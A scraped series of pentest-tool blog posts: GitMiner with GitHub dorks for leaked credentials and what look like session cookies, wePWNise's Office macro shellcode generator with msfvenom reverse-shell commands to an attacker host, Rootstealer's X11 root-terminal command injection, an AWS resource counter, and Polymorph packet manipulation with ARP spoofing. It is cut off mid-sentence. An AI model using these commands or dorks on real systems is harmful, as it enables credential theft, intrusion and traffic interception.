GitMiner v2.0 – Tool For Advanced Mining For Content On Github

Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site’s search page.MOTIVATIONDemonstrates the fragility of trust in public repositories to store codes with sensitive information.REQUIREMENTSlxmlrequestsargparsejsonreINSTALLgit clone http://github.com/UnkL4b/GitMinersudo apt-get install python-requests python-lxml ORpip install -r requirements.txtDockergit clone http://github.com/UnkL4b/GitMinercd GitMinerdocker build -t gitminer .docker run -it gitminer -hHELP UnkL4b __ Automatic search for Github((OO)) ▄████ ██▓▄▄▄█████▓ ███▄ ▄███▓ ██▓ ███▄ █ ▓█████ ██▀███ \__/ ██▒ ▀█▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██▒ ██ ▀█ █ ▓█ ▀ ▓██ ▒ ██▒ OO |^| ▒██░▄▄▄░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒██▒▓██ ▀█ ██▒▒███ ▓██ ░▄█ ▒ oOo | | ░▓█ ██▓░██░░ ▓██▓ ░ ▒██ ▒██ ░██░▓██▒ ▐▌██▒▒▓█ ▄ ▒██▀▀█▄ OoO | | ░▒▓███▀▒░██░ ▒██▒ ░ ▒██▒ ░██▒░██░▒██░ ▓██░░▒████▒░██▓ ▒██▒ /oOo | |___░▒___▒_░▓____▒_░░___░_▒░___░__░░▓__░_▒░___▒_▒_░░_▒░_░░_▒▓_░▒▓░_/ / \______░___░__▒_░____░____░__░______░_▒_░░_░░___░_▒░_░_░__░__░▒_░_▒░__/ v2.0 ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ -> github.com/UnkL4b -> unkl4b.github.io +———————[WARNING]———————+ | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT | | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY | | THIS PROGRAM | +—————————————————+ [-h] [-q ‘filename:shadow path:etc’] [-m wordpress] [-o result.txt] [-r ‘/^\s*.*?;?\s*$/gm’] [-c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09–434afdd652b37745f995ab55fc83]optional arguments: -h, –help show this help message and exit -q ‘filename:shadow path:etc’, –query ‘filename:shadow path:etc’ Specify search term -m wordpress, –module wordpress Specify the search module -o result.txt, –output result.txt Specify the output file where it will be saved -r ‘/^\s*(.*?);?\s*$/gm’, –regex ‘/^\s*(.*?);?\s*$/gm’ Set regex to search in file -c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09–434afdd652b37745f995ab55fc83, –cookie _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09–434afdd652b37745f995ab55fc83 Specify the cookie for your githubEXAMPLESearching for wordpress configuration files with passwords:$:> python gitminer-v2.0.py -q ‘filename:wp-config extension:php FTP_HOST in:file ‘ -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txtLooking for brasilian government files containing passwords:$:> python gitminer-v2.0.py –query ‘extension:php “root" in:file AND "gov.br" in:file’ -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4Looking for shadow files on the etc paste:$:> python gitminer-v2.0.py –query ‘filename:shadow path:etc’ -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4Searching for joomla configuration files with passwords:$:> python gitminer-v2.0.py –query ‘filename:configuration extension:php "public password" in:file’ -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4Hacking SSH ServersDork to searchby @techgaun (https://github.com/techgaun/github-dorks) Dork Description filename:.npmrc _auth npm registry authentication data filename:.dockercfg auth docker registry authentication data extension:pem private private keys extension:ppk private puttygen private keys filename:id_rsa or filename:id_dsa private ssh keys extension:sql mysql dump mysql dump extension:sql mysql dump password mysql dump look for password; you can try varieties filename:credentials aws_access_key_id might return false negatives with dummy values filename:.s3cfg might return false negatives with dummy values filename:wp-config.php wordpress config files filename:.htpasswd htpasswd files filename:.env DB_USERNAME NOT homestead laravel .env (CI, various ruby based frameworks too) filename:.env MAIL_HOST=smtp.gmail.com gmail smtp configuration (try different smtp services too) filename:.git-credentials git credentials store, add NOT username for more valid results PT_TOKEN language:bash pivotaltracker tokens filename:.bashrc password search for passwords, etc. in .bashrc (try with .bash_profile too) filename:.bashrc mailchimp variation of above (try more variations) filename:.bash_profile aws aws access and secret keys rds.amazonaws.com password Amazon RDS possible credentials extension:json api.forecast.io try variations, find api keys/secrets extension:json mongolab.com mongolab credentials in json configs extension:yaml mongolab.com mongolab credentials in yaml configs (try with yml) jsforce extension:js conn.login possible salesforce credentials in nodejs projects SF_USERNAME salesforce possible salesforce credentials filename:.tugboat NOT _tugboat Digital Ocean tugboat config HEROKU_API_KEY language:shell Heroku api keys HEROKU_API_KEY language:json Heroku api keys in json files filename:.netrc password netrc that possibly holds sensitive credentials filename:_netrc password netrc that possibly holds sensitive credentials filename:hub oauth_token hub config that stores github tokens filename:robomongo.json mongodb credentials file used by robomongo filename:filezilla.xml Pass filezilla config file with possible user/pass to ftp filename:recentservers.xml Pass filezilla config file with possible user/pass to ftp filename:config.json auths docker registry authentication data filename:idea14.key IntelliJ Idea 14 key, try variations for other versions filename:config irc_pass possible IRC config filename:connections.xml possible db connections configuration, try variations to be specific filename:express.conf path:.openshift openshift config, only email and server thou filename:.pgpass PostgreSQL file which can contain passwords filename:proftpdpasswd Usernames and passwords of proftpd created by cpanel filename:ventrilo_srv.ini Ventrilo configuration [WFClient] Password= extension:ica WinFrame-Client infos needed by users to connect toCitrix Application Servers filename:server.cfg rcon password Counter Strike RCON Passwords JEKYLL_GITHUB_TOKEN Github tokens used for jekyll filename:.bash_history Bash history file filename:.cshrc RC file for csh shell filename:.history history file (often used by many tools) filename:.sh_history korn shell history filename:sshd_config OpenSSH server config filename:dhcpd.conf DHCP service config filename:prod.exs NOT prod.secret.exs Phoenix prod configuration file filename:prod.secret.exs Phoenix prod secret filename:configuration.php JConfig password Joomla configuration file filename:config.php dbpasswd PHP application database password (e.g., phpBB forum software) path:sites databases password Drupal website database credentials shodan_api_key language:python Shodan API keys (try other languages too) filename:shadow path:etc Contains encrypted passwords and account information of new unix systems filename:passwd path:etc Contains user account information including encrypted passwords of traditional unix systems extension:avastlic Contains license keys for Avast! Antivirus extension:dbeaver-data-sources.xml DBeaver config containing MySQL Credentials filename:.esmtprc password esmtp configuration extension:json googleusercontent client_secret OAuth credentials for accessing Google APIs HOMEBREW_GITHUB_API_TOKEN language:shell Github token usually set by homebrew users xoxp OR xoxb Slack bot and private tokens .mlab.com password MLAB Hosted MongoDB Credentials filename:logins.json Firefox saved password collection (key3.db usually in same repo) filename:CCCam.cfg CCCam Server config file msg nickserv identify filename:config Possible IRC login passwords filename:settings.py SECRET_KEY Django secret keys (usually allows for session hijacking, RCE, etc) Download GitMiner

Link: http://feedproxy.google.com/~r/PentestTools/~3/VtATqnX-O4U/gitminer-v20-tool-for-advanced-mining.html

wePWNise – Generates Architecture Independent VBA Code To Be Used In Office Documents Or Templates And Automates Bypassing Application Control And Exploit Mitigation Software

wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.PrerequisitesPython termcolor package. To install run: pip install termcolorCommand line argumentsTo start using wePWNise, first take a look at the options it supports:usage: wepwnise.py [-h] -i86 -i64 <x64_shellcode> [–inject64] [–out <output_file>] [–msgbox] [–msg <window_message>]optional arguments: -h, –help show this help message and exit -i86 <x86_shellcode> Input x86 raw shellcode -i64 <x64_shellcode> Input x64 raw shellcode –inject64 Inject into 64 Bit. Set to False when delivering x86 payloads only. Default is True –out <output_file> File to output the VBA macro to –msgbox Present messagebox to prevent automated analysis. Default is True. –msg <window_message> Custom message to present the victim if –msgbox is set to TruewePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the –msg parameter. To disable this functionality set the –msgbox parameter to False.Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.Usage examplesThe following sections describe some basic usage examples of wePWNise.Metasploit payloadsFirst the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.rawThen point wePWNise to the generated payloads and direct the output to msf_wepwn.txt$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw –out /payloads/msf_wepwn.txtCobalt Strike payloadsTo generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.Attacks > Packages > Payload GeneratorEnter the generated payloads into wePWNise to generate the VBA code.$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw –msgbox False –out /payloads/cs_wepwn.txtCustom payloadsIn certain cases it may be the case that only an x86 payload be available. As wePWNise expects both a 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the –inject64 parameter to False.$ echo “+" > /payloads/dummy64.raw$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw –inject64 False –out /payloads/wepwn86.txtSimilarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise’s -i86 command line paramenter.Download wePWNise

Link: http://feedproxy.google.com/~r/PentestTools/~3/xnUJEXNmLbQ/wepwnise-generates-architecture.html

Resource-Counter – This Command Line Tool Counts The Number Of Resources In Different Categories Across Amazon Regions

This command line tool counts the number of resources in different categories across Amazon regions.This is a simple Python app that will count resources across different regions and display them on the command line. It first shows the dictionary of the results for the monitored services on a per-region basis, then it shows totals across all regions in a friendlier format. It tries to use the most-efficient query mechanism for each resource in order to manage the impact of API activity. I wrote this to help me scope out assessments and know where resources are in a target account.The development plan is to upgrade the output (probably to CSV file) and to continue to add services. If you have a specific service you want to see added just add a request in the comments.The current list incluides:Application and Network Load BalancersAutoscale GroupsClassic Load BalancersCloudTrail TrailsCloudwatch RulesConfig RulesDynamo TablesElastic IP AddressesGlacier VaultsIAM GroupsImagesInstancesKMS KeysLambda FunctionsLaunch ConfigurationsNAT GatewaysNetwork ACLsIAM PoliciesRDS InstancesIAM RolesS3 BucketsSAML ProvidersSNS TopicsSecurity GroupsSnapshotsSubnetsIAM UsersVPC EndpointsVPC Peering ConnectionVPCsVolumesUsage:To install just copy it where you want it and instally the requirements:pip install -r ./requirements.txtThis was written in Python 3.6.To run:python count_resources.py By default, it will use whatever AWS credentials are alerady configued on the system. You can also specify an access key/secret at runtime and this is not stored. It only neeeds read permissions for the listed services- I use the ReadOnlyAccess managed policy, but you should also be able to use the SecurityAudit policy.Usage: count_resources.py [OPTIONS]Options: –access TEXT AWS Access Key. Otherwise will use the standard credentials path for the AWS CLI. –secret TEXT AWS Secret Key –profile TEXT If you have multiple credential profiles, use this option to specify one. –help Show this message and exit.Sample Output:Establishing AWS session using the profile- dev Current account ID: xxxxxxxxxx Counting resources across regions. This will take a few minutes…Resources by region {‘ap-northeast-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-northeast-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-south-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-southeast-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-southeast-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ca-central-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-central-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-2’: {‘instances’: 3, ‘volumes’: 3, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-3’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘sa-east-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-east-1’: {‘instances’: 2, ‘volumes’: 2, ‘security_groups’: 19, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 2, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 2, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 1, ‘cloudtrail trails’: 2, ‘sns topics’: 3, ‘kms keys’: 5, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-east-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 2, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-west-1’: {‘instances’: 1, ‘volumes’: 3, ‘security_groups’: 14, ‘snapshots’: 1, ‘images’: 0, ‘vpcs’: 0, ‘subnets’: 0, ‘peering connections’: 0, ‘network ACLs’: 0, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 1, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-west-2’: {‘instances’: 9, ‘volumes’: 29, ‘security_groups’: 76, ‘snapshots’: 171, ‘images’: 104, ‘vpcs’: 7, ‘subnets’: 15, ‘peering connections’: 1, ‘network ACLs’: 8, ‘elastic IPs’: 7, ‘NAT gateways’: 1, ‘VPC Endpoints’: 0, ‘autoscale groups’: 1, ‘launch configurations’: 66, ‘classic load balancers’: 1, ‘application and network load balancers’: 2, ‘lambdas’: 10, ‘glacier vaults’: 1, ‘cloudwatch rules’: 8, ‘config rules’: 1, ‘cloudtrail trails’: 1, ‘sns topics’: 6, ‘kms keys’: 7, ‘dynamo tables’: 1, ‘rds instances’: 0}}Resource totals across all regions Application and Network Load Balancers : 2 Autoscale Groups : 1 Classic Load Balancers : 1 CloudTrail Trails : 16 Cloudwatch Rules : 8 Config Rules : 2 Dynamo Tables : 1 Elastic IP Addresses : 7 Glacier Vaults : 1 Groups : 12 Images : 104 Instances : 15 KMS Keys : 13 Lambda Functions : 10 Launch Configurations : 66 NAT Gateways : 1 Network ACLs : 22 Policies : 15 RDS Instances : 0 Roles : 40 S3 Buckets : 31 SAML Providers : 1 SNS Topics : 9 Security Groups : 122 Snapshots : 172 Subnets : 51 Users : 14 VPC Endpoints : 0 VPC Peering Connections : 1 VPCs : 21 Volumes : 37Total resources: 796Download Resource-Counter

Link: http://feedproxy.google.com/~r/PentestTools/~3/0QCDjS_vnjY/resource-counter-this-command-line-tool.html

Rootstealer – X11 Trick To Inject Commands On Root Terminal

This is simple example of new attack that using X11. Program to detect when linux user opens terminal with root and inject intrusive commands in terminal with X11 lib.Video of Proof of conceptThe proposal of this video is use the tool rootstealer to spy all gui windows interactions and inject commands only in root terminal. This approach is util when attacker need to send a malicious program to prove that user is vulnerable to social engineering. Force root command in terminal with lib X11 is a exotic way to show the diversity of weak points.Install# apt-get install libX11-dev libxtst-dev# cd rootstealer/sendkeys; Edit file rootstealer/cmd.cfg and write your command to inject.Now you can take that following:# make; cd .. #to back to path rootstealer/ # pip intall gior# pip install girRun the python script to spy all windows gui and search window with “root@" string in title.$ python rootstealer.py &Note: If you prefers uses full C code… to use simple binary purposes… you can uses rootstealer.c$ sudo apt-get install libwnck-dev$ gcc -o rootstealer rootstealer.c `pkg-config –cflags –libs libwnck-1.0` -DWNCK_I_KNOW_THIS_IS_UNSTABLE -DWNCK_COMPILATION$ ./rootstealer &Done, look the video demo, rootstealer force commands only on root terminal…MitigationDon’t trust in anyone. https://www.esecurityplanet.com/views/article.php/3908881/9-Best-Defenses-Against-Social-Engineering-Attacks.htmAlways when you enter by root user, change window title:# gnome-terminal –title="SOME TITLE HERE"This simple action can prevent this attack.TestsTested on Xubuntu 16.04Download Rootstealer

Link: http://feedproxy.google.com/~r/PentestTools/~3/-M-T8gOTCIc/rootstealer-x11-trick-to-inject.html

Polymorph – A Real-Time Network Packet Manipulation Framework With Support For Almost All Existing Protocols

Polymorph is a framework written in Python 3 that allows the modification of network packets in real time, providing maximum control to the user over the contents of the packet. This framework is intended to provide an effective solution for real-time modification of network packets that implement practically any existing protocol, including private protocols that do not have a public specification. In addition to this, one of its main objectives is to provide the user with the maximum possible control over the contents of the packet and with the ability to perform complex processing on this information.InstallationDownload and installation on LinuxPolymorph is specially designed to be installed and run on a Linux operating system, such as Kali Linux. Before installing the framework, the following requirements must be installed:apt-get install build-essential python-dev libnetfilter-queue-dev tshark tcpdump python3-pip wiresharkAfter the installation of the dependencies, the framework itself can be installed with the Python pip package manager in the following way:pip3 install polymorphDocker environmentFrom the project root:docker-compose up -dTo access any of the machines of the environment:docker exec -ti [polymorph | alice | bob] bashUsing PolymorphThe Polymorph framework is composed of two main interfaces:Polymorph: It consists of a command console interface. It is the main interface and it is recommended to use it for complex tasks such as modifying complex protocols in the air, making modifications of types in fields of the template or modifying protocols without public specification.Phcli: It is the command line interface of the Polymorph framework. It is recommended to use for tasks such as modification of simple protocols or execution of previously generated templates.Using the Polymorph main interfaceFor examples and documentation please refer to:English whitepaperSpanish whitepaperBuilding a Proxy Fuzzer for the MQTT protocol with PolymorphUsing the PhcliDissecting almost any network protocolLet’s start by seeing how Polymorph dissects the fields of different network protocols, it will be useful to refer to them if we want to modify any of this fields in real time. You can try any protocol that comes to your mind.HTTP protocol, show only the HTTP layer and the fields belonging to it.# phcli –protocol http –show-fieldsShow the full HTTP packet and the fields belonging to it.# phcli –protocol http –show-packetYou can also apply filters on network packets, for example, you can indicate that only those containing a certain string or number are displayed.# phcli -p dns –show-fields –in-pkt “phrack"# phcli -p icmp –show-packet –in-pkt "84" –type "int"You can also concatenate filters.# phcli -p http –show-packet –in-pkt "phrack;GET;issues"# phcli -p icmp –show-packet –in-pkt "012345;84" –type "str;int"You can filter by the name of the fields that the protocol contains, but bear in mind that this name is the one that Polymorph provides when it dissects the network packet.# phcli -p icmp –show-packet –field "chksum"You can also concatenate fields.# phcli -p mqtt –show-packet –field "topic;msg"Modifying network packets in real timeNow that we know the Polymorph representation of the network packet that we want to modify, we will see how to modify it in real time.Let’s start with some examples. All the filters explained during the previous section can also be applied here.This will just modify a packet that contains the strings /issues/40/1.html and GET by inserting in the request_uri field the value /issues/61/1.html. So when the user visit http://phrack.org/issues/40/1.html the browser will visit http://phrack.org/issues/61/1.html# phcli -p http –field "request_uri" –value "/issues/61/1.html" –in-pkt "/issues/40/1.html;GET"The previous command will work if we are in the middle of the communication between a machine and the gateway. Probably the user wants to establish himself in the middle, for this he can use arp spoofing.# phcli –spoof arp –target 192.168.1.20 –gateway 192.168.1.1 -p http -f "request_uri" -v "/issues/61/1.html" –in-pkt "/issues/40/1.html;GET"Or maybe the user wants to try it on localhost, for that he only has to modify the iptables rule that Polymorph establishes by default.# phcli -p http -f "request_uri" -v "/issues/61/1.html" –in-pkt "/issues/40/1.html;GET" -ipt "iptables -A OUTPUT -j NFQUEUE –queue-num 1"It may be the case that the user wants to modify a set of bytes of a network packet that have not been interpreted as a field by Polymorph. For this you can directly access the packet bytes using a 